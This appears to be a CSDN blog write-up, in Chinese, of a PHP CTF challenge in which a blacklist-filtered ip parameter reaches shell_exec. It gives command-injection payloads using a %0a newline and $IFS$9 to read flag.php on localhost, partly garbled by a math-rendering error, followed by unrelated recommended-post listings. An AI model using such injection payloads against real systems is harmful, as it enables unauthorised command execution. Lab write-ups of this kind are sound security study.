Challenge_9

于 2024-07-25 09:27:55 发布
阅读量416 收藏 5
点赞数 5
分类专栏: # PHP_Code_Challenge 文章标签: CTF PHP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52579508/article/details/140680634
版权

image.png
docker 拉取不了 给了源文件 开始代码审计
这个题 有全局变量 ip
shell_exec 函数 稳稳的RCE了

KaTeX parse error: Expected 'EOF', got '&' at position 30: …= array(<br />'&̲' => '',<br />…’ => ‘’,
‘(’ => ‘’,
‘)’ => ‘’,
‘`’ => ‘’,
‘||’ => ‘’,
);

存在过滤
image.png
尝试输入一个ip地址
是可以执行命令的 ,但是由于我这里是window系统 看看能不能存在 windows的过滤方法
找了半天没有存在的绕过windows的方法 ,这里由于是windows搭建的 参加的方法被过滤掉了
linux可以使用 %0a 去进行 绕过
完整payload

http://localhost:3000/challenge9.php?ip=127.0.0.1%0als

[http://localhost:3000/challenge9.php?ip=127.0.0.1%0acat$IFS 9 f l a g . p h p ] ( h t t p : / / l o c a l h o s t : 3000 / c h a l l e n g e 9. p h p ? i p = 127.0.0.1 9flag.php](http://localhost:3000/challenge9.php?ip=127.0.0.1%0acat 9flag.php](http://localhost:3000/challenge9.php?ip=127.0.0.1IFS 9 f l a g . p h p ) 这里 9flag.php) 这里 9flag.php)这里IFS$9是绕过空格

小龙_(R0 Team)
关注
  • 5
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
flutter_ui_challenge_flight_search.zip
08-10
9. `.gitignore`:版本控制忽略规则。 10. `README.md`:项目介绍和指南。 在实际开发过程中,为了实现飞行搜索的UI,开发者可能使用了TextField进行输入查询,DropdownButton显示航班选项,ListView或GridView呈现...
leetcode苹果-leetcode_challenge_apples_oranges_sql:leetcode_challenge_app
06-30
苹果leetcode_challenge_apples_oranges_sql 表:销售额 列名 类型 发售日期 日期 水果 枚举 已售数量 整数 (sale_date,fruit) 是该表的主键。 此表包含每天销售的“苹果”和“橙子”的销售额。 编写一个 SQL 查询来...
攻防世界 MISC - challenge_how_many_Vigenère
c868954104的博客
11-13 151
题目让我们用google搜索解密出的明文,看明文内容开头,alice leaves the teapart。得到作品名为Alice's Adventures in Wonderland。题目名提示提示是维吉尼亚密码,但是正常的维吉尼亚密码是有密钥的。将作品名全部改为小写并去掉字母以外的符号。注意将key的长度修改为3-100。使用刚才的密钥进行加密得到flag。使用在线网站进行爆破密钥。
攻防世界-MISC-challenge_how_many_Vigenère
m0_62840741的博客
11-07 487
而维吉尼亚密码则是在单表的基础上,加入了密钥字,使用密钥字对明文进行分组加密,因此即使密钥(打乱的字母表)确定了,密钥字不同,也会产生不同的密文,即非固定式对。但是不同的是,单表代换密码中一旦密钥字母确定,相同的明文就只能产生唯一的密文;依照题目描述,搜索出来的是爱丽丝梦游仙境(不能科学上网,这里就不演示了)维吉尼亚密码是在代换密码(即单表代换)基础上,衍生出来的多表代换密码。看了大佬的WP发现还有个在线解密的网站,咱就按在线解密的做题了。根据题目的表示是维吉尼亚密码。
【愚公系列】2022年01月 攻防世界-进阶题-MISC-77(challenge_how_many_Vigenère)
热门推荐
时光隧道
01-30 3万+
文章目录一、challenge_how_many_Vigenère二、答题步骤1.下载附件2.解密总结 一、challenge_how_many_Vigenère 题目链接:https://adworld.xctf.org.cn/task/task_list?type=misc&number=1&grade=1&page=5 题目描述:恢复出文档中的明文内容,对明文进行谷歌搜索,得到一个作品名。 把作品名改为纯小写,删除字母以外的字符。 将作品名用你得到的keys用题目中的加密方式
challenge_4
qq_52579508的博客
07-24 838
a的值再执行eval函数这一特点,通过gpc传递给$a特殊的字符串,经过计算后与原本的var_dump();组合造成拼接效果,形成一个新的字符串,使eval函数执行我们预期的php代码。PHP对于双引号包裹起来的字符串要进行扫描计算,单引号则不管内容如何都会原样输出而不会进行计算。一个超全局变量,可以接收_get,_post,_cookie发送的数据。先使用eval 执行phpinfo 看是否执行成功。首先看见eval 应该是可以执行php代码的。使用了双引号,意味着,会先计算。
攻防世界 Misc challenge_how_many_Vigenère
MrTreebook的博客
04-16 229
攻防世界 Misc challenge_how_many_Vigenère1.解密 1.解密 根据提示知道是维吉尼亚加密 找一个在线网站解密 解密: ohihzkssefkmqxqbkihybnynvndzkdlqvhwhgywaftmeteecqprzjczvnmhnzwyasmlwbwvaqitejbfofycejjlcbpk 爱丽丝梦游仙境 即Alice’s Adventures in Wonderland 根据题目要求 进行加密 得到flag:LCTF{osqjdcsvz
NSS [HNCTF 2022 Week1]Challenge__rce
Jay17的博客
09-16 570
NSS [HNCTF 2022 Week1]Challenge__rce
the python challenge_The Python Challenge 解密之旅
weixin_39754831的博客
12-07 276
本文是记录博主运用 Python 来解决 The Python Challenge 站点中每个关卡的难题。说明:本文为博主自主原创,允许转载,但是必须标明来源出处及其作者,谢谢!The Python Challenge 介绍Python Challenge is a game in which each level can be solved by a bit of (Python) progra...
the python challenge_About The Python Challenge
weixin_39636176的博客
12-07 77
Python Challenge is a game in which each level can be solved by a bitof (Python) programming.The Python Challenge was written by Nadav Samet.All levels can be solved by straightforward and very short1...
攻防世界 Misc高手进阶区 7分题 challenge_how_many_Vigenère
闵行小鱼塘
02-02 1125
继续ctf的旅程,攻防世界Misc高手进阶区的7分题,本篇是challenge_how_many_Vigenère的writeup
leetcodepremium-Leetcode_may_challenge_java:Leetcode_may_challenge_java
07-07
溢价Leetcode_may_challenge_java 此挑战适合初学者,高级和非高级用户均可使用。 它由 5 月份的 31 道日常问题组成。 每天都会在此处添加一个问题,您有 24 小时的时间对其进行有效提交,以便有资格获得奖励。
lipstick_challenge_game-master.zip
06-22
9. **游戏设计**:挑战的概念如何在游戏中体现,游戏的界面设计,关卡设计等都是游戏设计的重要组成部分。 由于没有更具体的文件结构和内容,以上只是对"lipstick_challenge_game-master.zip"可能包含的知识点的...
leetcode卡-daily_challenge_leetcode:Daily_challenge_leetcode
07-06
leetcode卡每日编码挑战 6 月 30 天 Python 代码挑战 来自 Leetcode 的 SQL 练习
全新转转交易猫自带客服多模板全开源完整定制版源码
08-27
定制版全开源完整无授权 商品发布; 请在后台商品添加成功后, 再点击该商品管理,可重新编辑当前商品的所有信息及配图以及支付等等相关信息 可点击分享或者跳转,将链接地址进行发布分享 请在手机端打开访问 访问商品主要模板文件路径目录 咸鱼; http://你的域名地址/Xianyu_goods/ 代练妈妈;http://你的域名地址/dlmm/ 大麦商品;http://你的域名地址/dm/dzpj.php 大麦售票;http://你的域名地址/dm/dzp.php 交易猫; http://你的域名地址/jym/ QQ卡框工具;http://你的域名地址/kk/ 京东; http://你的域名地址/www.jd.com/index1.php 转转;http:/ 安装教程; 环境; PHP版本5.6,数据库版本MySQL 5.6 第一步源码上传解压 第二步找到config文件夹找到Conn.php修改数据库 第三步导入数据库sql.sql 第四步http://域名/wuyun.php登录后台 默认登录后台账号及密码; 默认账号;admin 默认密码;123456 源码内附详细搭建教程TXT文档
项目模板-硬件详细设计说明书.doc
最新发布
08-27
项目模板-硬件详细设计说明书.doc
深入探索MySQL的存储引擎:数据持久化的奥秘
08-27
MySQL是一个流行的开源关系型数据库管理系统(RDBMS),广泛用于Web应用程序的后端数据存储。它基于结构化查询语言(SQL)来管理数据,并且是LAMP(Linux, Apache, MySQL, PHP/Python/Perl)技术栈的一部分,这个技术栈常用于构建动态网站和Web应用程序。 MySQL的特点包括: - **开放源代码**:MySQL的源代码是公开的,任何人都可以自由使用和修改。 - **跨平台**:MySQL可以在多种操作系统上运行,包括Linux、Windows、macOS等。 - **高性能**:MySQL以其快速的查询处理和良好的性能而闻名。 - **可靠性**:MySQL提供了多种机制来确保数据的完整性和可靠性,包括事务支持、备份和恢复功能。 - **易于使用**:MySQL提供了简单直观的界面和丰富的文档,便于用户学习和使用。 - **可扩展性**:MySQL支持从小型应用到大型企业级应用的扩展。 - **社区支持**:由于其广泛的使用,MySQL拥有一个活跃的开发者社区,提供大量的资源和支持。 MySQL被广泛应用于各种场景,包括在线事务处理(OL
ts中 类型“cfg_challenge_days_task | cfg_seven_days_task” 如何判断当前是game.cfg_challenge_days_task类
06-11
你可以使用 `instanceof` 操作符来判断一个对象是否是某个类的实例。在这个例子中,你可以使用以下代码来判断一个对象是否是 `game.cfg_challenge_days_task` 类的实例: ``` if (obj instanceof game.cfg_challenge_days_task) { // 对象是 game.cfg_challenge_days_task 类的实例 } else { // 对象不是 game.cfg_challenge_days_task 类的实例 } ``` 其中,`obj` 是要判断的对象。如果对象是 `game.cfg_challenge_days_task` 类的实例,条件表达式的值为 `true`,否则为 `false`。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值